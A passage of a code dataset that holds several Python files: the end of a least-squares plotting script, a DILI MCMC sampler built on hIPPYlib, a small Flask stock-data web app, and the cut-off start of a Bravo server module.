a*meanX\r\n\treturn a,b\r\n\r\ndef pltDot(xDot,yDot,rg,plt):\r\n\tax = plt.subplot(2,1,2)\r\n\tplt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\r\n\tplt.plot(xDot, yDot, 'ro',markersize=5)\r\n\tplt.axis(rg)\r\n\r\ndef plt3d(X, Y, Z):\r\n\tfrom mpl_toolkits.mplot3d import Axes3D\r\n\tfig = plt.figure(1)\r\n\r\n\tax = Axes3D(fig)\r\n\r\n\r\n\tax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.cm.hot)\r\n\tax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=plt.cm.hot)\r\n\tax.set_zlim(-2,2)\r\n\r\n# 数据文件名\r\nXmat, Ymat= loadDataSet(\"D:/DevN/sample-data/zhengjie-data/chapter07/regdataset.txt\")\r\nplt.figure(figsize=(10, 8))\r\na,b=leastSquare(Xmat, Ymat)\r\nyhat=cal(Xmat,Ymat,a,b)\r\n\r\n#详细拟合过程\r\nleastSquareDedail(Xmat, Ymat)\r\n\r\n# 绘制图形\r\nplotscatter(Xmat,Ymat,plt)\r\nplotLine(Xmat,yhat,plt)\r\nxDot=[1,2,3,4]\r\nyDot=[1,4,9,16]\r\n\r\nrg=[0, max(xDot)+1,0, max(yDot)+1]\r\npltDot(xDot,yDot,rg,plt)\r\n\r\nplt.show()","sub_path":"core.framework.datamining.pyscript/evaluation/linear_regression/line_regression.py","file_name":"line_regression.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460555476","text":"#!/usr/bin/env python\n\"\"\"\nDimension-independent likelihood-informed (DILI) MCMC\nby Tiangang Cui, Kody J.H. Law, and Youssef M. 
Marzouk\nhttp://www.sciencedirect.com/science/article/pii/S0021999115006701\n------------------------------------------------------------------\ntailored to using hIPPYlib library https://hippylib.github.io\n-------------------------\nCreated March 29, 2017\n\"\"\"\n__author__ = \"Shiwei Lan\"\n__copyright__ = \"Copyright 2017, The EQUiPS projects\"\n__license__ = \"GPL\"\n__version__ = \"0.9\"\n__maintainer__ = \"Shiwei Lan\"\n__email__ = \"slan@caltech.edu; lanzithinking@outlook.com\"\n\nimport dolfin as dl\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.sparse.linalg\nimport timeit,time\nimport sys\nsys.path.append( \"../\" )\n# from util import Eigen,wtQR\n\nfrom ..modeling.variables import STATE, PARAMETER\nfrom ..utils.vector2function import vector2Function\nfrom ..algorithms.multivector import MultiVector, MvDSmatMult\nfrom ..algorithms.randomizedEigensolver import doublePassG\nfrom ..utils.random import Random\nfrom .geometry import Geometry\n\nfrom ..mcmc.tracers import NullTracer\nfrom ..mcmc.chain import NullQoi\n\n# def CholQR(Y,W):\n# \"\"\"\n# CholQR with W-inner products\n# ----------------------------\n# Arvind K. Saibaba, Jonghyun Lee, Peter K. Kitanidis,\n# Randomized algorithms for Generalized Hermitian Eigenvalue Problems with application to computing Karhunen-Loeve expansion,\n# Numerical Linear Algebra with Applications 23 (2), pp. 314-339.\n# \"\"\"\n# Z=W.dot(Y) if type(W) is np.ndarray else np.array([W(r) for r in Y.T]).T\n# C=Y.T.dot(Z)\n# L=np.linalg.cholesky(C)\n# Q=np.linalg.solve(L,Y.T).T\n# return Q,L.T\n\nclass DILI:\n \"\"\"\n Dimension-independent likelihood-informed (DILI) MCMC by Tiangang Cui, Kody J.H. Law, and Youssef M. Marzouk\n http://www.sciencedirect.com/science/article/pii/S0021999115006701\n ------------------------------------------------------------------\n The main purpose is to speed up the mixing of dimension-independent MCMC defined on function (Hilbert) space.\n The key idea is to find likelihood-informed (low dimensional) subspace (LIS) using prior pre-conditioned Gauss-Newton approximation of Hessian (ppGNH) averaged wrt. 
posterior samples;\n and apply more sophisticated/expensive methods (Langevin) in LIS and explore the complement subspace (CS) with more efficient/cheap methods like pCN.\n ------------------------------------------------------------------\n After the class is instantiated with arguments, call adaptive_MCMC to collect MCMC samples which will be stored in 'result' folder.\n \"\"\"\n def __init__(self,parameter_init,model,step_size,proposal='LI_Langevin',adpt_h=False,**kwargs):\n \"\"\"\n Initialize DILI MCMC instance with parameter, function providing geometric information, step size and proposal method:\n v : whitened parameter (vector) to sample\n model : model to provide geometric information including log-density (likelihood), its gradient and Hessian (or Fisher) etc.\n Xi_m,Theta_m : accumulated LIS basis-- eigenvalues and eigenvectors (eigenfunctions)\n Xi_r,Theta_r : global LIS basis\n d_F,threshold_LIS : Forstner distance between two covariances to diagnose the convergence of LIS if it drops below threshold_LIS\n Sigma_r : posterior covariance projected to LIS, estimated from empirical projected samples\n emp_mean : empirical mean of parameter\n h : step size(s) of MCMC\n n_lag,n_max : interval/maximum number of LIS updates\n n_b : interval to update the projected (low-rank) posterior covariance approximation\n proposal : option for proposal in MCMC\n adpt_h : indicator to adapt step size(s)\n \"\"\"\n # parameter\n self.v=parameter_init\n self.dim=parameter_init.size()\n # model\n self.model=model\n \n # sampling setting\n self.h=np.array(step_size)\n self.n_lag=kwargs.pop('n_lag',200)\n self.n_max=kwargs.pop('n_max',1000)\n self.n_b=kwargs.pop('n_b',50)\n self.threshold_LIS=kwargs.pop('threshold_LIS',1e-5)\n \n target_acpt=kwargs.pop('target_acpt',0.65)\n # geometry needed\n self.kwargs=kwargs\n self.geom = Geometry(model)\n # self.geom=lambda parameter,geom_ord=[0],**kwargs: [kwargs.update(self.kwargs), self.model.get_geom(parameter,geom_ord=geom_ord,whitened=True,**kwargs)][1]\n self.loglik,self.gradlik,_,self.eigs=self.geom.get_geom(self.v,geom_ord=[0,1,1.5],thld=0.01)\n \n # LIS basis\n self.update_LIS_m=0\n self.Xi_m,self.Theta_m=self.eigs # local\n self.dim_LIS_l=self.Xi_m.size\n self.Xi_r,self.Theta_r=self.eigs # global\n self.dim_LIS_g=self.Xi_r.size\n print('Initial local/global LIS has %d dimensions.' 
% self.dim_LIS_l)\n self.d_F=np.inf # Forstner distance to detect convergence of LIS\n # (empirical estimate of) projected posterior covariance\n self.Sigma_r=1e-2*np.eye(self.dim_LIS_g)\n# self.Sigma_r=np.zeros((self.dim_LIS_g,self.dim_LIS_g))\n # empirical mean of parameter vector\n self.rk1update_empCOV_n=0\n self.emp_mean = self.model.generate_vector(PARAMETER)\n self.emp_mean.axpy(1.0, self.v)\n # self.emp_mean=dl.Vector(self.v)\n # initialize re-weighted basis\n self.update_COV()\n\n # operators\n self.proposal=proposal\n self.form_operators()\n \n # optional setting for adapting step size\n self.adpt_h=adpt_h\n if self.adpt_h:\n h_adpt={}\n# h_adpt['h']=self._init_h()\n h_adpt['h']=self.h\n h_adpt['mu']=np.log(10*h_adpt['h'])\n h_adpt['loghn']=0.\n h_adpt['An']=0.\n h_adpt['gamma']=0.05\n h_adpt['n0']=10\n h_adpt['kappa']=0.75\n h_adpt['a0']=target_acpt\n self.h_adpt=h_adpt\n\n def _operator(self,x,y,mv=None,D=None,d=0,M=None):\n \"\"\"\n Helper function to define operators A, B, and G\n \"\"\"\n if mv is None:\n mv=self.Psi_r\n if D is None:\n D=self.D_r\n if M is None:\n M=self.model.prior.M_PETScMatrix\n \n# y_mv=MultiVector(mv[0],1)\n# MvDSmatMult(mv,((D-d)*mv.dot_v(M*x))[:,None],y_mv)\n# y[:]=y_mv[0]\n y.zero()\n# mv.reduce(y,(D-d)*mv.dot_v(M*x)) # works with single process but has unexpected error in multi-process running\n Dmvx=(D-d)*mv.dot_v(M*x)\n for j in range(mv.nvec()):\n y.axpy(Dmvx[j],mv[j])\n if d:\n y.axpy(d,x)\n \n def form_operators(self):\n \"\"\"\n Form operators A, B, and G induced by reweighted LIS basis\n Input: Psi_r, D_r, h\n Output: D_Ar, D_Br, D_Gr, A, B, G\n \"\"\"\n # on LIS\n if self.proposal is 'LI_prior':\n self.D_Ar=(2-self.h[0]*self.D_r)/(2+self.h[0]*self.D_r)\n self.D_Br=np.sqrt(1-self.D_Ar**2)\n self.D_Gr=np.zeros_like(self.D_r)\n elif self.proposal is 'LI_Langevin':\n self.D_Ar=1-self.h[0]*self.D_r\n self.D_Br=np.sqrt(2*self.h[0]*self.D_r)\n self.D_Gr=self.h[0]*self.D_r\n else:\n if self.parameters['print_level'] > 0:\n print('Wrong proposal!')\n raise\n # on the complement space\n a_perp=(2-self.h[1])/(2+self.h[1])\n b_perp=np.sqrt(1-a_perp**2)\n # operators\n self.A=lambda x,y:self._operator(x,y,D=self.D_Ar,d=a_perp)\n self.B=lambda x,y:self._operator(x,y,D=self.D_Br,d=b_perp)\n self.G=lambda x,y:self._operator(x,y,D=self.D_Gr,d=0,M=1.) 
# G only applies to an assembled gradient\n \n def update_LIS(self,threshold_l=.01,threshold_s=1e-4,threshold_g=.01):\n \"\"\"\n Algorithm 1: Incremental update of the expected GNH and global LIS.\n Input: Theta_m, Xi_m, v_m1\n Output: Theta_m1, Xi_m1, Theta_r, Xi_r\n \"\"\"\n # count the number of calls\n self.update_LIS_m+=1\n m=self.update_LIS_m\n # Compute the local LIS basis\n _,_,_,eigs=self.geom.get_geom(self.v,geom_ord=[1.5],thld=threshold_l)\n Lambda_m1,Phi_m1=eigs\n self.dim_LIS_l=Lambda_m1.size\n # Compute the QR decomposition\n# Q,R=np.linalg.qr(np.hstack([self.Theta_m,Phi_m1]))\n# Q,R=wtQR.CholQR(np.hstack([self.Theta_m,Phi_m1]),lambda x:self.model.prior.M_PETScMatrix*x) # QR decomposition in weighted space R_M\n Theta_m1=MultiVector(self.v,len(self.Xi_m)+self.dim_LIS_l)\n for i in range(len(self.Xi_m)):\n Theta_m1[i][:]=self.Theta_m[i]\n for i in range(self.dim_LIS_l):\n Theta_m1[len(self.Xi_m)+i][:]=Phi_m1[i]\n Q=MultiVector(Theta_m1)\n _,R=Q.Borthogonalize(self.model.prior.M_PETScMatrix)\n # Compute the new eigenvalues through the eigendecomposition\n eig_aug=np.hstack([m*self.Xi_m,Lambda_m1])\n mat_aug=(R*eig_aug).dot(R.T)/(m+1)\n# k=min([eig_aug.shape[0],mat_aug.shape[0]-1])\n# Xi_m1,W=sps.linalg.eigsh(mat_aug,k=k)\n Xi_m1,W=np.linalg.eigh(mat_aug)\n dsc_ord = Xi_m1.argsort()[::-1]\n Xi_m1 = Xi_m1[dsc_ord]; W = W[:,dsc_ord]\n # Compute the new basis\n# Theta_m1=Q.dot(W)\n MvDSmatMult(Q,W,Theta_m1)\n # truncate eigenvalues for updated LIS\n idx_s=Xi_m1>=threshold_s\n self.Theta_m=MultiVector(self.v,sum(idx_s))\n for i,j in enumerate(np.where(idx_s)[0]):\n self.Theta_m[i][:]=Theta_m1[j]\n self.Xi_m=Xi_m1[idx_s]\n # truncate eigenvalues for global LIS to return\n idx_g=Xi_m1>=threshold_g\n self.Theta_r=MultiVector(self.v,sum(idx_g))\n for i,j in enumerate(np.where(idx_g)[0]):\n self.Theta_r[i][:]=Theta_m1[j]\n self.Xi_r=Xi_m1[idx_g]\n self.dim_LIS_g=self.Xi_r.size\n# return self.Theta_r,self.Xi_r\n \n def rk1update_empCOV(self):\n \"\"\"\n Perform rank-1 update of the empirical (projected) covariance.\n ns^2(X_n1) = (n-1)s^2(X_n) + (1-1/(n+1)) * [_X_n;x]' * [1,-1;-1,1] * [_X_n;x],\n X_n1=[X_n;x], _X_n=mean(X_n), s^2(.)=sample covariance (std if 1d)\n Input: _X_n, s^2(X_n), x\n Output: s^2(X_n1)\n \"\"\"\n # count the number of calls\n self.rk1update_empCOV_n+=1\n n=self.rk1update_empCOV_n\n # projected vector\n# proj_v=self.Theta_r.T.dot(self.v)\n# rk1_v=np.vstack([self.emp_mean,proj_v])\n# rk1_v=np.vstack([self.emp_mean,self.v]).dot(self.Theta_r)\n rk1_v=np.array([self.Theta_r.dot_v(self.model.prior.M_PETScMatrix*r) for r in [self.emp_mean,self.v]])\n\n # rank-1 update of empirical covariance\n rk1_update=(1-1/np.float(n+1))*rk1_v.T.dot(np.array([[1,-1],[-1,1]])).dot(rk1_v)\n self.Sigma_r=((n-1)*self.Sigma_r+rk1_update)/n\n # update empirical mean\n# self.emp_mean=(n*self.emp_mean+proj_v)/(n+1)\n self.emp_mean*=np.float_(n)/(n+1)\n self.emp_mean.axpy(1.0/(n+1),self.v)\n \n def update_COV(self):\n \"\"\"\n Algorithm 2: Update of the low-rank posterior covariance approximation.\n Input: Theta_r, Sigma_r\n Output: Psi_r, D_r\n \"\"\"\n # Compute eigendecomposition\n self.D_r,W_r=np.linalg.eigh(self.Sigma_r)\n self.D_r=self.D_r[::-1]; W_r=W_r[:,::-1]\n if any(self.D_r<0):\n# if self.parameters['print_level'] > 0:\n# print('Ah-Oh--')\n self.D_r[abs(self.D_r)<1e-8] = abs(self.D_r[abs(self.D_r)<1e-8])\n # Return the reweighted LIS basis and the diagonalized covariance\n self.Psi_r=MultiVector(self.v, self.dim_LIS_g)\n MvDSmatMult(self.Theta_r,W_r,self.Psi_r)\n \n def 
project_COV(self,Theta_r):\n \"\"\"\n Algorithm 3: Posterior covariance re-projection for each LIS update.\n Input: Theta_r, Sigma_r, Theta_r1\n Output: Sigma_r1\n \"\"\"\n# Theta_r1r=self.Theta_r.T.dot(Theta_r)\n self.Theta_r1r=np.array([self.Theta_r.dot_v(self.model.prior.M_PETScMatrix*Theta_r[i]) for i in range(Theta_r.nvec())]).T\n# Sigma_r_=self.Sigma_r.copy()\n# Sigma_r_[np.diag_indices_from(Sigma_r_)]-=1\n# Sigma_r1=Theta_r1r.dot(Sigma_r_).dot(Theta_r1r.T)\n# Sigma_r1[np.diag_indices_from(Sigma_r1)]+=1\n# self.Sigma_r=Sigma_r1\n self.Sigma_r=self.Theta_r1r.dot(self.Sigma_r-np.eye(self.Sigma_r.shape[0])).dot(self.Theta_r1r.T) + np.eye(self.Theta_r1r.shape[0])\n# # need to re-project empirical mean estimate of (projected) parameter\n# self.emp_mean=Theta_r1r.dot(self.emp_mean)\n \n def MH_step(self,v_ref=None):\n \"\"\"\n A Metropolis-Hastings step to generate a (posterior) sample.\n Input: v, [loglik, gradlik]\n Output: v1, [loglik1, gradlik1], acpt (indicator)\n \"\"\"\n# if v_ref is None:\n# v_ref=np.zeros_like(self.v)\n# state=self.geom.x[STATE].copy()\n # Compute a candidate using either LI-prior or LI-Langevin\n # Compute the (log) acceptance probability\n noise = dl.Vector()\n self.model.prior.init_vector(noise,\"noise\")\n self.randomGen.normal(1., noise)\n # Random.normal(noise, 1., True)\n xi=self.model.generate_vector(PARAMETER)\n self.geom.whtprior.sample(noise, xi)\n v=self.model.generate_vector(PARAMETER); v_help=dl.Vector(v)\n self.A(self.v,v); self.B(xi,v_help)\n v.axpy(1.,v_help)\n log_acpt=0 # log of acceptance probability\n if self.proposal is 'LI_prior':\n loglik,_,_,_=self.geom.get_geom(v)\n elif self.proposal is 'LI_Langevin':\n self.G(self.gradlik,v_help)\n v.axpy(1.,v_help)\n loglik,gradlik,_,_=self.geom.get_geom(v,geom_ord=[0,1])\n Psi_r_v=self.Psi_r.dot_v(self.model.prior.M_PETScMatrix*self.v); Psi_r_v1=self.Psi_r.dot_v(self.model.prior.M_PETScMatrix*v)\n l2_norm2=lambda x: x.dot(x)\n dum0=.5*l2_norm2(Psi_r_v)+.5*l2_norm2((Psi_r_v1-self.D_Ar*Psi_r_v-self.D_Gr*(self.Psi_r.dot_v(self.gradlik)))/self.D_Br)\n dum1=.5*l2_norm2(Psi_r_v1)+.5*l2_norm2((Psi_r_v-self.D_Ar*Psi_r_v1-self.D_Gr*(self.Psi_r.dot_v(gradlik)))/self.D_Br)\n log_acpt+= dum0-dum1\n else:\n if self.parameters['print_level'] > 0:\n print('Wrong proposal!')\n raise\n # log of acceptance probability\n log_acpt+=-self.loglik+loglik\n if v_ref is not None:\n log_acpt+= (self.model.prior.M_PETScMatrix*v_ref).dot(self.v-v)\n # print('log-Metropolis ratio: %0.2f' % log_acpt)\n # accept/reject step\n if np.isfinite(log_acpt) and np.log(np.random.uniform())0]))\n \n def _init_h(self):\n \"\"\"\n find a reasonable initial step size\n \"\"\"\n h=np.array([.5,1.])\n _self=self\n _self.h=h;_self.form_operators()\n _,logr=self.MH_step()\n a=2.*(np.exp(logr)>0.5)-1.\n while a*logr>-a*np.log(2):\n h*=pow(2.,a)\n _self=self\n _self.h=h;_self.form_operators()\n _,logr=self.MH_step()\n return h\n \n def _dual_avg(self,iter,an):\n \"\"\"\n dual-averaging to adapt step size\n \"\"\"\n hn_adpt=self.h_adpt\n hn_adpt['An']=(1.-1./(iter+hn_adpt['n0']))*hn_adpt['An'] + (hn_adpt['a0']-an)/(iter+hn_adpt['n0'])\n logh=hn_adpt['mu'] - np.sqrt(iter)/hn_adpt['gamma']*hn_adpt['An']\n hn_adpt['loghn']=pow(iter,-hn_adpt['kappa'])*logh + (1.-pow(iter,-hn_adpt['kappa']))*hn_adpt['loghn']\n hn_adpt['h']=np.exp(logh)\n return hn_adpt\n \n def setup(self,num_samp=1000,num_burnin=100,prt_lvl=1,mpi_comm=dl.mpi_comm_world(),seed=2017,**kwargs):\n \"\"\"\n setup (MPI, storage, etc.) 
for sampling\n \"\"\"\n self.parameters={}\n self.parameters['number_of_samples']=num_samp\n self.parameters['number_of_burnins']=num_burnin\n self.parameters['print_level']=prt_lvl\n self.data = np.zeros((num_samp, 4))\n self.m = self.model.generate_vector(PARAMETER)\n self.m2 = self.model.generate_vector(PARAMETER)\n self.mpi_comm=mpi_comm # or default to be self.model.problem.model.mesh.mpi_comm()\n self.rank = dl.MPI.rank(self.mpi_comm)\n self.nproc = dl.MPI.size(self.mpi_comm)\n # set (common) random seed\n self.randomGen = Random(seed=1)\n # if self.nproc > 1:\n # Random.split(self.rank, self.nproc, 1000000, seed)\n # else:\n # Random.seed(seed)\n np.random.seed(seed)\n \n # allocate space to store results\n import os\n samp_fname='_samp_DILI_'+self.proposal+'_dim'+str(self.dim)+'_'+time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n samp_fpath=os.path.join(os.getcwd(),'result')\n if not os.path.exists(samp_fpath):\n os.makedirs(samp_fpath)\n # self.samp=dl.HDF5File(dl.mpi_comm_world(),os.path.join(samp_fpath,samp_fname+\".h5\"),\"w\")\n self.logLik=np.zeros(num_samp+num_burnin)\n self.acpt=0.0 # final acceptance rate\n self.LIS_dims=[] # record the changes in the dimension of global LIS\n self.dFs=[] # record the history of Forstner distances\n self.times=np.zeros(num_samp+num_burnin) # record the history of time used for each sample\n \n # number of adaptations for step size\n if self.adpt_h:\n self.h_adpt['n_adpt']=kwargs.pop('adpt_steps',num_burnin)\n self.stepszs=np.zeros((self.h_adpt['n_adpt'],len(self.h)))\n\n def save_data(self, n):\n if n >= self.parameters['number_of_burnins']:\n if self.model.qoi is not None:\n q = self.model.qoi.eval(self.geom.x)\n else:\n q = 0\n save_id = n - self.parameters['number_of_burnins']\n self.data[save_id, 0] = q\n self.data[save_id, 1] = self.geom.cost\n m = self.geom.x[PARAMETER]\n\n if save_id == 0:\n self.m.axpy(1., m)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m, mhelp)\n self.data[save_id, 2] = np.sqrt(self.m.inner(mhelp))\n self.m2[:] = m.get_local() ** 2\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m2, mhelp)\n self.data[save_id, 3] = np.sqrt(self.m2.inner(mhelp))\n else:\n mhelp = self.model.generate_vector(PARAMETER)\n mhelp.axpy(1., self.m)\n self.m.zero()\n self.m.axpy(np.double(save_id) / (save_id + 1), mhelp)\n self.m.axpy(1. / (save_id + 1), m)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m, mhelp)\n self.data[save_id, 2] = np.sqrt(self.m.inner(mhelp))\n\n mhelp = self.model.generate_vector(PARAMETER)\n mhelp.axpy(1., self.m2)\n self.m2.zero()\n self.m2.axpy(np.double(save_id) / (save_id + 1), mhelp)\n mhelp[:] = m.get_local() ** 2\n self.m2.axpy(1. / (save_id + 1), mhelp)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m2, mhelp)\n self.data[save_id, 3] = np.sqrt(self.m2.inner(mhelp))\n\n\n def adaptive_MCMC(self,num_retry_bad=0,**kwargs):\n \"\"\"\n Algorithm 4: Adaptive function space MCMC with operator-weighted proposals.\n Require: During the LIS construction, we retain local{Theta_m,Xi_m} to store the expected GNH evaluated from m samples;\n and the value of d_F between the most recent two updates of the expected GNH, for LIS convergence monitoring.\n Require: At step n, given the state v_n, LIS basis Theta_r, projected empirical posterior covariance Sigma_r,\n and operators {A, B, G} induced by {Psi_r, D_r, h}, one step of the algorithm is below. 
\n \"\"\"\n if self.parameters['print_level'] > 0:\n print('\\nRunning adaptive DILI MCMC now...\\n')\n\n # initialize some recording statistics\n accp=0.0 # online acceptance\n num_cons_bad=0 # number of consecutive bad proposals\n \n beginning=timeit.default_timer()\n for n in xrange(self.parameters['number_of_samples']+self.parameters['number_of_burnins']):\n\n if n==self.parameters['number_of_burnins']:\n # start the timer\n tic=timeit.default_timer()\n if self.parameters['print_level'] > 0:\n print('\\nBurn-in completed; recording samples now...\\n')\n\n # MH-step\n while True:\n try:\n acpt_idx,log_acpt=self.MH_step()\n except RuntimeError as e:\n print(e)\n if num_retry_bad==0:\n acpt_idx=False; log_acpt=-np.inf\n# self.model._init_states(src4init='map_solution') # reinitialize solution to MAP\n if self.parameters['print_level'] > 0:\n print('Bad proposal encountered! Passing... bias introduced.')\n break # reject bad proposal: bias introduced\n else:\n num_cons_bad+=1\n if num_cons_bad<num_retry_bad:\n if self.parameters['print_level'] > 0:\n print('Bad proposal encountered! Retrying...')\n continue # retry until a valid proposal is made\n else:\n acpt_idx=False; log_acpt=-np.inf\n# self.model._init_states(src4init='map_solution') # reinitialize solution to MAP\n num_cons_bad=0\n if self.parameters['print_level'] > 0:\n print(str(num_retry_bad)+' consecutive bad proposals encountered! Passing...')\n break # reject it and keep going\n else:\n num_cons_bad=0\n break\n \n accp+=acpt_idx\n\n # display acceptance at intervals\n if (n+1)%100==0:\n if self.parameters['print_level'] > 0:\n print('\\nAcceptance at %d iterations: %0.2f' % (n+1,accp/100))\n accp=0.0\n\n # save results\n self.save_data(n)\n self.logLik[n]=self.loglik\n if n>=self.parameters['number_of_burnins']:\n # v_f=vector2Function(self.v,self.model.problem.Vh[PARAMETER])\n # self.samp.write(v_f,'sample_{0}'.format(n-self.parameters['number_of_burnins']))\n self.acpt+=acpt_idx\n \n # adaptation of LIS\n update=False\n if (n+1)%self.n_lag==0 and self.update_LIS_m<self.n_max and self.d_F>=self.threshold_LIS:\n # record the current LIS basis\n Theta_r_=MultiVector(self.Theta_r); Xi_r_=self.Xi_r.copy()\n # Update LIS\n if self.parameters['print_level'] > 0:\n print('\\nUpdating LIS...')\n self.update_LIS(**kwargs)\n if self.parameters['print_level'] > 0:\n print(self.Xi_m)\n print('Local LIS has %d dimensions; and new global LIS has %d dimensions.' % (self.dim_LIS_l,self.dim_LIS_g))\n self.LIS_dims.append(self.dim_LIS_g)\n # Project (posterior) COV\n self.project_COV(Theta_r_)\n # Update the LIS convergence diagnostic\n self.LISconvergence_diagnostic(Theta_r_,Xi_r_)\n if self.parameters['print_level'] > 0:\n print('Forstner distance between two consecutive LIS'' becomes %.2e.\\n' % self.d_F)\n update=True\n if self.d_F<self.threshold_LIS:\n if self.parameters['print_level'] > 0:\n print('\\nConvergence diagnostic has dropped below the threshold. Stop updating LIS.\\n')
\n else:\n self.dFs.append(self.d_F)\n else:\n # Perform rank-1 update of the empirical covariance\n self.rk1update_empCOV()\n if (n+1)%self.n_b==0:\n update=True\n if update:\n # Update (low-rank) COV approximation\n self.update_COV()\n # Update the operators\n self.form_operators()\n if self.parameters['print_level'] > 0:\n print('Low-rank posterior covariance approximation updated!')\n \n # record the time\n self.times[n]=timeit.default_timer()-beginning\n \n # adapt step size h if needed\n if self.adpt_h:\n if n<self.h_adpt['n_adpt']:\n self.h_adpt=self._dual_avg(n+1,np.exp(min(0,log_acpt)))\n self.h=self.h_adpt['h']; self.form_operators()\n self.stepszs[n,:]=self.h\n if self.parameters['print_level'] > 0:\n print('New step size: {}; \\t New averaged step size: {}\\n'.format(self.h_adpt['h'],np.exp(self.h_adpt['loghn'])))\n if n==self.h_adpt['n_adpt']:\n self.h_adpt['h']=np.exp(self.h_adpt['loghn'])\n self.h=self.h_adpt['h']; self.form_operators()\n if self.parameters['print_level'] > 0:\n print('Adaptation completed; step size frozen at: {}\\n'.format(self.h_adpt['h']))\n\n # stop timer\n # self.samp.close()\n toc=timeit.default_timer()\n self.time=toc-tic\n self.acpt/=self.parameters['number_of_samples']\n if self.parameters['print_level'] > 0:\n print(\"\\nAfter %g seconds, %d samples have been collected with the final acceptance rate %0.2f \\n\"\n % (self.time,self.parameters['number_of_samples'],self.acpt))\n\n # # save samples to file\n # self.save_samp()\n \n def save_samp(self):\n \"\"\"\n Save results to file\n \"\"\"\n import os,pickle\n # create folder if not existing\n cwd=os.getcwd()\n self.savepath=os.path.join(cwd,'result')\n if not os.path.exists(self.savepath):\n os.makedirs(self.savepath)\n # name file\n ctime=time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n self.filename='DILI_'+self.proposal+'_dim'+str(self.dim)+'_'+ctime\n # dump data\n f=open(os.path.join(self.savepath,self.filename+'.pckl'),'wb')\n res2save=[self.h,self.proposal,self.logLik,self.acpt,self.time,self.times,\n self.n_lag,self.n_max,self.n_b,self.threshold_LIS,self.update_LIS_m,self.LIS_dims,self.dFs,self.Xi_r]\n if self.adpt_h:\n res2save.append([self.stepszs,self.h_adpt])\n pickle.dump(res2save,f)\n f.close()\n # save global LIS\n# self.Theta_r.export(self.model.problem.Vh[PARAMETER],os.path.join(self.savepath,'gLIS_'+self.filename+'.pvd'))\n self.Theta_r.export(self.model.problem.Vh[PARAMETER],os.path.join(self.savepath,'gLIS_'+self.filename+'.xdmf'))","sub_path":"PDE_Models/hippylib/sampler/DILI_hippy.py","file_name":"DILI_hippy.py","file_ext":"py","file_size_in_byte":30112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"550624409","text":"from flask import Flask\r\nfrom flask import request\r\nfrom flask import render_template\r\nfrom flask import Response\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField,DateField,SelectField\r\nfrom wtforms.validators import DataRequired, Length\r\nfrom flask_bootstrap import Bootstrap\r\nfrom HW3demo import pred\r\nfrom stockdata import realtime,history\r\nimport time\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'dev'\r\nbootstrap = Bootstrap(app)\r\n\r\n\r\ndef add(x):\r\n return int(x)+10\r\n\r\n\r\nclass stockdataForm(FlaskForm):\r\n start = DateField('Start date ( Year-month-day xxxx-xx-xx )', format='%Y-%m-%d')\r\n end = DateField('End date ( Year-month-day xxxx-xx-xx )', format='%Y-%m-%d')\r\n company = SelectField('Company', choices=[\r\n ('aaba', 'Altaba'), \r\n ('aapl', 'Apple'),\r\n ('amd', 'AMD'),\r\n ('amzn', 'Amazon'),\r\n ('goog', 'Google'),\r\n ('intc', 'Intel'),\r\n ('nvda', 'Nvidia'),\r\n ('qcom', 'Qualcomm'),\r\n ('tsla', 
'Tesla'),\r\n ('xlnx', 'Xlinx')\r\n ]) #'value', 'view'\r\n submit = SubmitField()\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route(\"/stockdata\", methods=['GET'])\r\ndef stockdata():\r\n form = stockdataForm()\r\n return render_template('stockdata.html',form=form)\r\n\r\n\r\n@app.route(\"/stockdata\", methods=['POST'])\r\ndef stockdata1():\r\n form = stockdataForm()\r\n start_date = request.form['start']\r\n end_date = request.form['end']\r\n company = request.form['company']\r\n price, volume, localtime = realtime(company)\r\n fig_dict, data = history(company, start_date, end_date)\r\n \r\n return render_template('stockdata.html',\r\n form=form, price=price, volume=volume, localtime=localtime,\r\n url=fig_dict, dynamic=time.time(), data=data)\r\n\r\n\r\n@app.route(\"/predict\", methods=['GET', 'POST'])\r\ndef predict():\r\n return render_template('predict.html')\r\n\r\n\r\n@app.route(\"/findsim\", methods=['GET'])\r\ndef findsim():\r\n form = stockdataForm()\r\n return render_template('findsimilar.html', form=form)\r\n\r\n\r\n@app.route(\"/findsim\", methods=['POST'])\r\ndef findsim1():\r\n form = stockdataForm()\r\n start_date = request.form['start']\r\n end_date = request.form['end']\r\n company = request.form['company']\r\n price, volume, localtime = realtime(company)\r\n fig_dict, data = history(company, start_date, end_date)\r\n \r\n return render_template('findsimilar.html',\r\n form=form, price=price, volume=volume, localtime=localtime,\r\n url=fig_dict, dynamic=time.time(), data=data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=1, port=5500)\r\n","sub_path":"source code/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249052329","text":"from twisted.application.internet import TCPClient, TCPServer\nfrom twisted.application.service import Application, MultiService\nfrom twisted.application.strports import service as serviceForEndpoint\nfrom twisted.internet.protocol import Factory\nfrom twisted.python import log\n\nfrom bravo.amp import ConsoleRPCFactory\nfrom bravo.config import configuration, read_configuration\nfrom bravo.factories.beta import BravoFactory\nfrom bravo.factories.infini import InfiniNodeFactory\nfrom bravo.protocols.beta import BetaProxyProtocol\n\nclass BetaProxyFactory(Factory):\n protocol = BetaProxyProtocol\n\n def __init__(self, name):\n self.name = name\n self.port = configuration.getint(\"infiniproxy %s\" % name, \"port\")\n\ndef 